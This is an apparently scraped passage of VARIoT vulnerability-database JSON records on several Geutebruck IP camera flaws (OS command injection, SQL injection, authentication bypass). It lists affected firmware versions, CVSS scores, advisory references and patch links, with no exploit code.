          },
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03"
          },
          {
            "trust": 2.4,
            "url": "http://packetstormsecurity.com/files/158888/geutebruck-testaction.cgi-remote-command-execution.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16205"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16205"
          },
          {
            "trust": 0.6,
            "url": "https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2719/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-08-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "date": "2020-11-06T05:06:27",
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "date": "2020-08-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          },
          {
            "date": "2020-08-14T14:15:12.487000",
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-03-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "date": "2020-11-06T05:06:27",
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "date": "2020-08-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          },
          {
            "date": "2024-11-21T05:06:55.957000",
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "G-Cam and  G-Code In  OS Command injection vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201803-2218

    Vulnerability from variot - Updated: 2024-11-23 21:53

    An SQL injection vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow an attacker to alter stored data. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebrück company

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201803-2218",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.7,
            "vendor": "geutebruck",
            "version": "1.12.0.4"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam\\/efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "1.12.0.4"
          },
          {
            "model": "topline topfd-2125",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.19"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "g cam efd 2250",
            "version": "1.12.0.4"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "topfd 2125",
            "version": "3.15.1"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
        "sources": [
          {
            "db": "BID",
            "id": "103474"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-7528",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.4,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-7528",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 9.4,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-06024",
                "impactScore": 9.2,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "NONE",
                "baseScore": 9.4,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "e2e94500-39ab-11e9-a236-000c29342cb1",
                "impactScore": 9.2,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:N",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 6.4,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-137560",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 9.1,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-7528",
                "impactScore": 5.2,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7528",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7528",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-06024",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201803-762",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "e2e94500-39ab-11e9-a236-000c29342cb1",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137560",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "An SQL injection vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow an attacker to alter stored data. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the   affected device, or to bypass certain security restrictions to perform  unauthorized actions, to compromise the application to access or modify  data and to exploit vulnerabilities in the underlying database, to  execute arbitrary script code in the browser of an unsuspecting user in  the context of the affected site or to  execute arbitrary code within  the context of the  affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7528",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-079-01",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "103474",
            "trust": 2.0
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "E2E94500-39AB-11E9-A236-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "id": "VAR-201803-2218",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          }
        ],
        "trust": 1.7456349166666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:53:17.817000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "GeutebruckIPCamerasSQL injection vulnerability patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/122849"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250  and Topline TopFD-2125 SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79348"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/103474"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7528"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7528"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "date": "2018-03-22T18:29:01.087000",
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "date": "2024-11-21T04:12:18.187000",
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck G-Cam/EFD-2250 and  Topline TopFD-2125 In  SQL Injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          }
        ],
        "trust": 0.8
      }
    }

    VAR-201803-2221

    Vulnerability from variot - Updated: 2024-11-23 21:53

    Unauthentication vulnerabilities have been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow remote code execution. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. GeutebruckIPCameras has a remote code execution vulnerability that an attacker can exploit to execute arbitrary code. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebrück company

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201803-2221",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.7,
            "vendor": "geutebruck",
            "version": "1.12.0.4"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam\\/efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "1.12.0.4"
          },
          {
            "model": "topline topfd-2125",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.19"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "g cam efd 2250",
            "version": "1.12.0.4"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "topfd 2125",
            "version": "3.15.1"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "db": "NVD",
